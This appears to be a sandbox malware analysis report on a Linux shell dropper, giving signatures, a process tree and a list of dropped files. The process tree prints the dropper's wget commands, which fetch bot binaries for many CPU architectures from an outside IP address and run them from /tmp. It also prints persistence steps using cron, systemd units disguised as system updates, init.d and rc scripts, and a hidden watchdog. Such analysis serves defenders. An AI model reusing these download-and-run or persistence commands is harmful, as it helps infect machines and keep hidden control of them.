Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20260513-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20260513-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    31/07/2026, 13:47

General

  • Target
    34d2e47fa8f6b64e346623b4ed66898b86d53891900b953e69f02e2b3ffb2cc9.sh
  • Size 2KB
  • Sample260731-q3hecsvxcs
  • SHA256 34d2e47fa8f6b64e346623b4ed66898b86d53891900b953e69f02e2b3ffb2cc9
  • MD5 SHA1 SHA512 TLSH

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 12 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 15 IoCs
  • Creates/modifies Cron job 1 TTPs 2 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Creates/modifies environment variables 1 TTPs 5 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies init.d 2 TTPs 2 IoCs

    Adds/modifies system service, likely for persistence.

  • Modifies rc script 2 TTPs 2 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

  • Modifies systemd 2 TTPs 4 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

  • Write file to user bin folder 4 IoCs
  • Writes file to system bin folder 1 IoCs
  • Modifies Bash startup script 2 TTPs 5 IoCs
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Creates a desktop entry file 3 TTPs 1 IoCs

    A .desktop file is used by desktop environments to register and launch applications. This can be abused to gain persistence.

  • Reads CPU attributes 1 TTPs 2 IoCs
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to shm directory 1 IoCs

    Malware can drop malicious files in the shm directory which will run directly from RAM.

  • Writes file to tmp directory 18 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/34d2e47fa8f6b64e346623b4ed66898b86d53891900b953e69f02e2b3ffb2cc9.sh
    /tmp/34d2e47fa8f6b64e346623b4ed66898b86d53891900b953e69f02e2b3ffb2cc9.sh
    1⤵
    • Executes dropped EXE
    PID:1488
    • /usr/bin/wget
      wget http://144.31.151.138:5000/payload/bins/client_x86_64 -q
      2⤵
      • Writes file to tmp directory
      PID:1489
    • /bin/chmod
      chmod +x client_x86_64
      2⤵
      • File and Directory Permissions Modification
      PID:1495
    • /usr/bin/wget
      wget http://144.31.151.138:5000/payload/bins/client_i686 -q
      2⤵
      • Writes file to tmp directory
      PID:1497
    • /tmp/client_x86_64
      ./client_x86_64
      2⤵
      • Executes dropped EXE
      • Creates/modifies Cron job
      • Creates/modifies environment variables
      • Enumerates active TCP sockets
      • Modifies init.d
      • Modifies rc script
      • Modifies systemd
      • Write file to user bin folder
      • Writes file to system bin folder
      • Modifies Bash startup script
      • Checks CPU configuration
      • Creates a desktop entry file
      • Reads system network configuration
      • Reads runtime system information
      • Writes file to shm directory
      • Writes file to tmp directory
      PID:1496
      • /bin/sh
        sh -c "systemctl daemon-reload 2>/tmp/.systemd.log"
        3⤵
        • Writes file to tmp directory
        PID:1504
        • /bin/systemctl
          systemctl daemon-reload
          4⤵
          • Reads runtime system information
          PID:1505
      • /bin/sh
        sh -c "df / | tail -1 | awk '{print \$2,\$4}'"
        3⤵
          PID:1525
          • /usr/bin/awk
            awk "{print \$2,\$4}"
            4⤵
              PID:1528
            • /bin/df
              df /
              4⤵
                PID:1526
              • /usr/bin/tail
                tail -1
                4⤵
                  PID:1527
              • /bin/sh
                sh -c "systemctl enable system-update.service 2>>/tmp/.systemd.log"
                3⤵
                • Writes file to tmp directory
                PID:1533
                • /bin/systemctl
                  systemctl enable system-update.service
                  4⤵
                    PID:1534
                • /bin/sh
                  sh -c "systemctl reset-failed system-update.service 2>/dev/null"
                  3⤵
                    PID:1555
                    • /bin/systemctl
                      systemctl reset-failed system-update.service
                      4⤵
                        PID:1556
                    • /bin/sh
                      sh -c "systemctl start system-update.service 2>>/tmp/.systemd.log"
                      3⤵
                      • Writes file to tmp directory
                      PID:1557
                      • /bin/systemctl
                        systemctl start system-update.service
                        4⤵
                          PID:1558
                      • /bin/sh
                        sh -c "systemctl enable network-check.service 2>/dev/null"
                        3⤵
                          PID:1560
                          • /bin/systemctl
                            systemctl enable network-check.service
                            4⤵
                              PID:1561
                          • /bin/sh
                            sh -c "(crontab -l 2>/dev/null | grep -v '\\.sysupd' | grep -v 'system-update'; echo '@reboot /usr/local/bin/.sysupd > /dev/null 2>&1'; echo '*/5 * * * * /usr/local/bin/.sysupd > /dev/null 2>&1') | crontab - 2>/dev/null"
                            3⤵
                              PID:1585
                              • /usr/bin/crontab
                                crontab -
                                4⤵
                                • Creates/modifies Cron job
                                PID:1587
                              • /bin/grep
                                grep -v system-update
                                4⤵
                                  PID:1590
                                • /bin/grep
                                  grep -v "\\.sysupd"
                                  4⤵
                                    PID:1589
                                  • /usr/bin/crontab
                                    crontab -l
                                    4⤵
                                      PID:1588
                                  • /bin/sh
                                    sh -c "update-rc.d sysupd defaults 2>/dev/null"
                                    3⤵
                                      PID:1591
                                      • /usr/sbin/update-rc.d
                                        update-rc.d sysupd defaults
                                        4⤵
                                          PID:1592
                                          • /usr/local/sbin/systemctl
                                            systemctl daemon-reload
                                            5⤵
                                              PID:1593
                                            • /usr/local/bin/systemctl
                                              systemctl daemon-reload
                                              5⤵
                                                PID:1593
                                              • /usr/sbin/systemctl
                                                systemctl daemon-reload
                                                5⤵
                                                  PID:1593
                                                • /usr/bin/systemctl
                                                  systemctl daemon-reload
                                                  5⤵
                                                    PID:1593
                                                  • /sbin/systemctl
                                                    systemctl daemon-reload
                                                    5⤵
                                                      PID:1593
                                                    • /bin/systemctl
                                                      systemctl daemon-reload
                                                      5⤵
                                                        PID:1593
                                                  • /bin/sh
                                                    sh -c "chkconfig --add sysupd 2>/dev/null"
                                                    3⤵
                                                      PID:1614
                                                    • /bin/sh
                                                      sh -c "rc-update add sysupd default 2>/dev/null"
                                                      3⤵
                                                        PID:1615
                                                      • /bin/sh
                                                        sh -c "mkdir -p /etc/xdg/autostart 2>/dev/null"
                                                        3⤵
                                                          PID:1616
                                                          • /bin/mkdir
                                                            mkdir -p /etc/xdg/autostart
                                                            4⤵
                                                              PID:1617
                                                          • /bin/sh
                                                            sh -c "systemctl enable system-watchdog.service 2>/dev/null"
                                                            3⤵
                                                              PID:1618
                                                              • /bin/systemctl
                                                                systemctl enable system-watchdog.service
                                                                4⤵
                                                                • Reads runtime system information
                                                                PID:1619
                                                            • /bin/sh
                                                              sh -c "systemctl start system-watchdog.service 2>/dev/null"
                                                              3⤵
                                                                PID:1644
                                                                • /bin/systemctl
                                                                  systemctl start system-watchdog.service
                                                                  4⤵
                                                                    PID:1645
                                                                • /bin/sh
                                                                  sh -c "systemctl enable system-check.timer 2>/dev/null"
                                                                  3⤵
                                                                    PID:1649
                                                                    • /bin/systemctl
                                                                      systemctl enable system-check.timer
                                                                      4⤵
                                                                        PID:1650
                                                                    • /usr/local/bin/.watchdog
                                                                      .watchdog
                                                                      3⤵
                                                                        PID:1648
                                                                        • /bin/sleep
                                                                          sleep 60
                                                                          4⤵
                                                                            PID:1651
                                                                          • /bin/systemctl
                                                                            systemctl is-active --quiet system-update.service
                                                                            4⤵
                                                                              PID:1751
                                                                            • /usr/bin/wc
                                                                              wc -l
                                                                              4⤵
                                                                                PID:1756
                                                                              • /usr/bin/pgrep
                                                                                pgrep -f "\\.sysupd"
                                                                                4⤵
                                                                                • Reads CPU attributes
                                                                                • Reads runtime system information
                                                                                PID:1755
                                                                              • /bin/sleep
                                                                                sleep 60
                                                                                4⤵
                                                                                  PID:1758
                                                                                • /usr/bin/setsid
                                                                                  setsid /usr/local/bin/.sysupd
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1757
                                                                                • /usr/local/bin/.sysupd
                                                                                  /usr/local/bin/.sysupd
                                                                                  4⤵
                                                                                    PID:1757
                                                                                  • /bin/systemctl
                                                                                    systemctl is-active --quiet system-update.service
                                                                                    4⤵
                                                                                      PID:1771
                                                                                    • /usr/bin/wc
                                                                                      wc -l
                                                                                      4⤵
                                                                                        PID:1774
                                                                                      • /usr/bin/pgrep
                                                                                        pgrep -f "\\.sysupd"
                                                                                        4⤵
                                                                                        • Reads CPU attributes
                                                                                        • Reads runtime system information
                                                                                        PID:1773
                                                                                      • /bin/sleep
                                                                                        sleep 60
                                                                                        4⤵
                                                                                          PID:1776
                                                                                        • /usr/bin/setsid
                                                                                          setsid /usr/local/bin/.sysupd
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1775
                                                                                        • /usr/local/bin/.sysupd
                                                                                          /usr/local/bin/.sysupd
                                                                                          4⤵
                                                                                            PID:1775
                                                                                        • /bin/sh
                                                                                          sh -c "systemctl start system-check.timer 2>/dev/null"
                                                                                          3⤵
                                                                                            PID:1672
                                                                                            • /bin/systemctl
                                                                                              systemctl start system-check.timer
                                                                                              4⤵
                                                                                              • Reads runtime system information
                                                                                              PID:1673
                                                                                          • /bin/sh
                                                                                            sh -c "mkdir -p /etc/update-motd.d 2>/dev/null"
                                                                                            3⤵
                                                                                              PID:1676
                                                                                              • /bin/mkdir
                                                                                                mkdir -p /etc/update-motd.d
                                                                                                4⤵
                                                                                                  PID:1677
                                                                                              • /bin/sh
                                                                                                sh -c "kill -HUP 1 2>/dev/null"
                                                                                                3⤵
                                                                                                  PID:1678
                                                                                                • /bin/sh
                                                                                                  sh -c "mkdir -p /etc/rc.d 2>/dev/null"
                                                                                                  3⤵
                                                                                                    PID:1679
                                                                                                    • /bin/mkdir
                                                                                                      mkdir -p /etc/rc.d
                                                                                                      4⤵
                                                                                                        PID:1680
                                                                                                    • /bin/sh
                                                                                                      sh -c "df / | tail -1 | awk '{print \$2,\$4}'"
                                                                                                      3⤵
                                                                                                        PID:1732
                                                                                                        • /usr/bin/awk
                                                                                                          awk "{print \$2,\$4}"
                                                                                                          4⤵
                                                                                                            PID:1735
                                                                                                          • /usr/bin/tail
                                                                                                            tail -1
                                                                                                            4⤵
                                                                                                              PID:1734
                                                                                                            • /bin/df
                                                                                                              df /
                                                                                                              4⤵
                                                                                                                PID:1733
                                                                                                          • /bin/chmod
                                                                                                            chmod +x client_i686
                                                                                                            2⤵
                                                                                                            • File and Directory Permissions Modification
                                                                                                            PID:1530
                                                                                                          • /usr/bin/wget
                                                                                                            wget http://144.31.151.138:5000/payload/bins/client_i586 -q
                                                                                                            2⤵
                                                                                                            • Writes file to tmp directory
                                                                                                            PID:1532
                                                                                                          • /tmp/client_i686
                                                                                                            ./client_i686
                                                                                                            2⤵
                                                                                                              PID:1531
                                                                                                            • /bin/chmod
                                                                                                              chmod +x client_i586
                                                                                                              2⤵
                                                                                                              • File and Directory Permissions Modification
                                                                                                              PID:1582
                                                                                                            • /usr/bin/wget
                                                                                                              wget http://144.31.151.138:5000/payload/bins/client_mips -q
                                                                                                              2⤵
                                                                                                              • System Network Configuration Discovery
                                                                                                              • Writes file to tmp directory
                                                                                                              PID:1584
                                                                                                            • /tmp/client_i586
                                                                                                              ./client_i586
                                                                                                              2⤵
                                                                                                                PID:1583
                                                                                                              • /bin/chmod
                                                                                                                chmod +x client_mips
                                                                                                                2⤵
                                                                                                                • File and Directory Permissions Modification
                                                                                                                PID:1640
                                                                                                              • /usr/bin/wget
                                                                                                                wget http://144.31.151.138:5000/payload/bins/client_mipsel -q
                                                                                                                2⤵
                                                                                                                • System Network Configuration Discovery
                                                                                                                • Writes file to tmp directory
                                                                                                                PID:1642
                                                                                                              • /tmp/client_mips
                                                                                                                ./client_mips
                                                                                                                2⤵
                                                                                                                • System Network Configuration Discovery
                                                                                                                PID:1641
                                                                                                              • /bin/chmod
                                                                                                                chmod +x client_mipsel
                                                                                                                2⤵
                                                                                                                • File and Directory Permissions Modification
                                                                                                                PID:1701
                                                                                                              • /usr/bin/wget
                                                                                                                wget http://144.31.151.138:5000/payload/bins/client_armv4l -q
                                                                                                                2⤵
                                                                                                                • Writes file to tmp directory
                                                                                                                PID:1703
                                                                                                              • /tmp/client_mipsel
                                                                                                                ./client_mipsel
                                                                                                                2⤵
                                                                                                                • System Network Configuration Discovery
                                                                                                                PID:1702
                                                                                                              • /bin/chmod
                                                                                                                chmod +x client_armv4l
                                                                                                                2⤵
                                                                                                                • File and Directory Permissions Modification
                                                                                                                PID:1705
                                                                                                              • /usr/bin/wget
                                                                                                                wget http://144.31.151.138:5000/payload/bins/client_armv5l -q
                                                                                                                2⤵
                                                                                                                • Writes file to tmp directory
                                                                                                                PID:1707
                                                                                                              • /tmp/client_armv4l
                                                                                                                ./client_armv4l
                                                                                                                2⤵
                                                                                                                  PID:1706
                                                                                                                • /bin/chmod
                                                                                                                  chmod +x client_armv5l
                                                                                                                  2⤵
                                                                                                                  • File and Directory Permissions Modification
                                                                                                                  PID:1709
                                                                                                                • /usr/bin/wget
                                                                                                                  wget http://144.31.151.138:5000/payload/bins/client_armv6l -q
                                                                                                                  2⤵
                                                                                                                  • Writes file to tmp directory
                                                                                                                  PID:1711
                                                                                                                • /tmp/client_armv5l
                                                                                                                  ./client_armv5l
                                                                                                                  2⤵
                                                                                                                    PID:1710
                                                                                                                  • /bin/chmod
                                                                                                                    chmod +x client_armv6l
                                                                                                                    2⤵
                                                                                                                    • File and Directory Permissions Modification
                                                                                                                    PID:1713
                                                                                                                  • /usr/bin/wget
                                                                                                                    wget http://144.31.151.138:5000/payload/bins/client_armv7l -q
                                                                                                                    2⤵
                                                                                                                    • Writes file to tmp directory
                                                                                                                    PID:1715
                                                                                                                  • /tmp/client_armv6l
                                                                                                                    ./client_armv6l
                                                                                                                    2⤵
                                                                                                                      PID:1714
                                                                                                                    • /bin/chmod
                                                                                                                      chmod +x client_armv7l
                                                                                                                      2⤵
                                                                                                                      • File and Directory Permissions Modification
                                                                                                                      PID:1717
                                                                                                                    • /usr/bin/wget
                                                                                                                      wget http://144.31.151.138:5000/payload/bins/client_powerpc -q
                                                                                                                      2⤵
                                                                                                                      • Writes file to tmp directory
                                                                                                                      PID:1719
                                                                                                                    • /tmp/client_armv7l
                                                                                                                      ./client_armv7l
                                                                                                                      2⤵
                                                                                                                        PID:1718
                                                                                                                      • /bin/chmod
                                                                                                                        chmod +x client_powerpc
                                                                                                                        2⤵
                                                                                                                        • File and Directory Permissions Modification
                                                                                                                        PID:1721
                                                                                                                      • /usr/bin/wget
                                                                                                                        wget http://144.31.151.138:5000/payload/bins/client_m68k -q
                                                                                                                        2⤵
                                                                                                                        • Writes file to tmp directory
                                                                                                                        PID:1723
                                                                                                                      • /tmp/client_powerpc
                                                                                                                        ./client_powerpc
                                                                                                                        2⤵
                                                                                                                          PID:1722
                                                                                                                        • /bin/chmod
                                                                                                                          chmod +x client_m68k
                                                                                                                          2⤵
                                                                                                                          • File and Directory Permissions Modification
                                                                                                                          PID:1725
                                                                                                                        • /usr/bin/wget
                                                                                                                          wget http://144.31.151.138:5000/payload/bins/client_sh4 -q
                                                                                                                          2⤵
                                                                                                                          • Writes file to tmp directory
                                                                                                                          PID:1727
                                                                                                                        • /tmp/client_m68k
                                                                                                                          ./client_m68k
                                                                                                                          2⤵
                                                                                                                            PID:1726
                                                                                                                          • /bin/chmod
                                                                                                                            chmod +x client_sh4
                                                                                                                            2⤵
                                                                                                                            • File and Directory Permissions Modification
                                                                                                                            PID:1729
                                                                                                                        • /tmp/client_sh4
                                                                                                                          ./client_sh4
                                                                                                                          1⤵
                                                                                                                            PID:1730

                                                                                                                          Network

                                                                                                                                MITRE ATT&CK Enterprise v16

                                                                                                                                Replay Monitor

                                                                                                                                Loading Replay Monitor...

                                                                                                                                Downloads

                                                                                                                                bashrc

                                                                                                                                • Path /etc/bashrc
                                                                                                                                • Size 82B
                                                                                                                                • SHA256 cb7e560a713ec53d74e673c1e9bdc0b1d78d29dcc94dd9873f80c554e955ff81
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                system-update

                                                                                                                                • Path /etc/cron.daily/system-update
                                                                                                                                • Size 90B
                                                                                                                                • SHA256 ebca8d6304ad93e6b9b4d65923c6e4f954464b9f0fdff8536a2554b670b5d05d
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                S99sysupd

                                                                                                                                • Path /etc/init.d/S99sysupd
                                                                                                                                • Size 157B
                                                                                                                                • SHA256 edc0fb9776a2eda380072b4b843c0018bc096621f13b7805222c21b9ab613874
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                sysupd

                                                                                                                                • Path /etc/init.d/sysupd
                                                                                                                                • Size 201B
                                                                                                                                • SHA256 2b0230617e4edd0bd73c5731c85aeb3d735ef4f36361dc5ce5c56242aa4fe99d
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                inittab

                                                                                                                                • Path /etc/inittab
                                                                                                                                • Size 34B
                                                                                                                                • SHA256 3aed6a03b04bcdd0efbebae14cd1530ce2b84c98841ef70408549ea9ab718cc7
                                                                                                                                • MD5 SHA1 SHA512

                                                                                                                                S99sysupd

                                                                                                                                • Path /etc/rc.d/S99sysupd
                                                                                                                                • Size 52B
                                                                                                                                • SHA256 e2150747de8d9fbbae72c07af9e9cc9ff04c1254b8fe4a7954e61f597bf32a55
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                network-check.service

                                                                                                                                • Path /etc/systemd/system/network-check.service
                                                                                                                                • Size 399B
                                                                                                                                • SHA256 c7486335b48982426b00993433e950dd93ada89e8a9f424a0e7d70347525084f
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                system-check.timer

                                                                                                                                • Path /etc/systemd/system/system-check.timer
                                                                                                                                • Size 117B
                                                                                                                                • SHA256 7997f63d751afd01ad76c6969674473d40826f55423fd816939e17f2dc3dffe3
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                system-update.service

                                                                                                                                • Path /etc/systemd/system/system-update.service
                                                                                                                                • Size 348B
                                                                                                                                • SHA256 af3367dc8ffa5fe056326aead0287b226d9ce0c1caca2ac2bc08bb409790114a
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                system-watchdog.service

                                                                                                                                • Path /etc/systemd/system/system-watchdog.service
                                                                                                                                • Size 279B
                                                                                                                                • SHA256 c628d93e2bdf86e6bd8ae9529cef1256bc929a4dd9e43b56258a3b4492dd41b4
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                system-update.desktop

                                                                                                                                • Path /etc/xdg/autostart/system-update.desktop
                                                                                                                                • Size 139B
                                                                                                                                • SHA256 6a53360ddd74486f775fd6a222f04ab2ea74559e70f7cd317af9b2a10decfeec
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                sysupd.pid

                                                                                                                                • Path /run/sysupd.pid
                                                                                                                                • Size 5B
                                                                                                                                • SHA256 72077d62533f1cf893cdc03dbc331a6664b01daf97e8792955ec3d4cda9cce74
                                                                                                                                • MD5 SHA1 SHA512

                                                                                                                                .bot.log

                                                                                                                                • Path /tmp/.bot.log
                                                                                                                                • Size 633B
                                                                                                                                • SHA256 ef1841cdedd9b8824ee9a405a01bd4d4304bf1e28d6ff8d6c1b1acae72a5e3ce
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                .bot.log

                                                                                                                                • Path /tmp/.bot.log
                                                                                                                                • Size 8KB
                                                                                                                                • SHA256 5cc4aed6a27a7f0a2086bad1dcd0876dff1ae887bc644b9d2a3a31f9059a648d
                                                                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                .bot.log

                                                                                                                                • Path /tmp/.bot.log
                                                                                                                                • Size 205B
                                                                                                                                • SHA256 f5fdf139006444a214ac06f80bff43b5cff7c7cbf62af440277f2671f536401a
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                .bot.log

                                                                                                                                • Path /tmp/.bot.log
                                                                                                                                • Size 345B
                                                                                                                                • SHA256 fc496e8f97407ac947c4fd980c05c6a47d3944bc30e7dd76e5560285140076aa
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                .bot.log

                                                                                                                                • Path /tmp/.bot.log
                                                                                                                                • Size 525B
                                                                                                                                • SHA256 64c83b937933de03132124828f83dd5abb8cf4655954db81564ae3808c094036
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                .persist.log

                                                                                                                                • Path /tmp/.persist.log
                                                                                                                                • Size 617B
                                                                                                                                • SHA256 dbd9f8b6d4c47896b300258f4049c0c09b4a24b7fbdab9b6b99d13080873e12d
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                .systemd.log

                                                                                                                                • Path /tmp/.systemd.log
                                                                                                                                • Size 129B
                                                                                                                                • SHA256 bc60bb1592fba274d976c9783aa7dd13d52ffc92452e3ae8cf51c28f91deff04
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                .systemd.log

                                                                                                                                • Path /tmp/.systemd.log
                                                                                                                                • Size 297B
                                                                                                                                • SHA256 5ef8f8d7d7759110649e5f398496775632836e8a8e9b3cd7adf28150ca4a9382
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                client_armv4l

                                                                                                                                • Path /tmp/client_armv4l
                                                                                                                                • Size 199KB
                                                                                                                                • SHA256 fccdd3aeab6d99bf0acdf88fb5e26eadc468db12b0d197a9af7403f936bb9b0b
                                                                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                client_armv5l

                                                                                                                                • Path /tmp/client_armv5l
                                                                                                                                • Size 195KB
                                                                                                                                • SHA256 0eb65f6b9fc182ef34044e5020ba64104634b0d03a7130c8fbf2a50506316bec
                                                                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                client_armv6l

                                                                                                                                • Path /tmp/client_armv6l
                                                                                                                                • Size 210KB
                                                                                                                                • SHA256 c966b434c2e83657f51eadce83d9770caf5494b0c5d4f46718cc0b3495879b83
                                                                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                client_armv7l

                                                                                                                                • Path /tmp/client_armv7l
                                                                                                                                • Size 182KB
                                                                                                                                • SHA256 8d0effb983fd1944d3666a792e20d9799790553aae586f9710e13ccffa72e11c
                                                                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                client_i586

                                                                                                                                • Path /tmp/client_i586
                                                                                                                                • Size 159KB
                                                                                                                                • SHA256 18ec8cc409e4c01f34abbad242ae662b299c8a8c4394c693598b16593e9c59f8
                                                                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                client_i686

                                                                                                                                • Path /tmp/client_i686
                                                                                                                                • Size 169KB
                                                                                                                                • SHA256 a7c31859fc34b9a24a7a002a3a300ae4bced52c702254f591dc0368cd25a443d
                                                                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                client_m68k

                                                                                                                                • Path /tmp/client_m68k
                                                                                                                                • Size 220KB
                                                                                                                                • SHA256 26300690b50d8e0b29b754fbf211d1c4314a9d17f714f2c8c5bb9c3716733e29
                                                                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                client_mips

                                                                                                                                • Path /tmp/client_mips
                                                                                                                                • Size 263KB
                                                                                                                                • SHA256 fe03712930908bc91ba6e7e1a6cb61a38dc7719a1b4b8386aa53463f51fc5b44
                                                                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                client_mipsel

                                                                                                                                • Path /tmp/client_mipsel
                                                                                                                                • Size 267KB
                                                                                                                                • SHA256 e9fe6802259c59cfe9fb7239164fd3300c8923c8cb13d0ae7dc8e9ebb15e83e5
                                                                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                client_powerpc

                                                                                                                                • Path /tmp/client_powerpc
                                                                                                                                • Size 200KB
                                                                                                                                • SHA256 3a60e6f71766e9f165c543fdf055479d3f280a84c4eeebdab644234041312e62
                                                                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                client_sh4

                                                                                                                                • Path /tmp/client_sh4
                                                                                                                                • Size 187KB
                                                                                                                                • SHA256 b96b18efd771963cee7556eb9d9be3187bdcb38401ca12ec44dba7c0b91bbe0a
                                                                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                client_x86_64

                                                                                                                                • Path /tmp/client_x86_64
                                                                                                                                • Size 205KB
                                                                                                                                • SHA256 4b30831d72a2b0345c0cccbcb79a1e9839ffb0a714b1241354bc6f145c665d1a
                                                                                                                                • MD5 SHA1 SHA512 SSDEEP TLSH

                                                                                                                                .watchdog

                                                                                                                                • Path /usr/local/bin/.watchdog
                                                                                                                                • Size 292B
                                                                                                                                • SHA256 c01f7937daec1fc274695bfe204b868ba40acffd02ce139f14e99bdc8c49d53c
                                                                                                                                • MD5 SHA1 SHA512 TLSH

                                                                                                                                tmp.I4RrqL

                                                                                                                                • Path /var/spool/cron/crontabs/tmp.I4RrqL
                                                                                                                                • Size 275B
                                                                                                                                • SHA256 5a7802f45ab14299542d7c39f69e17a5b4caeda54b3ea409c4cd0c1b021d63f4
                                                                                                                                • MD5 SHA1 SHA512 TLSH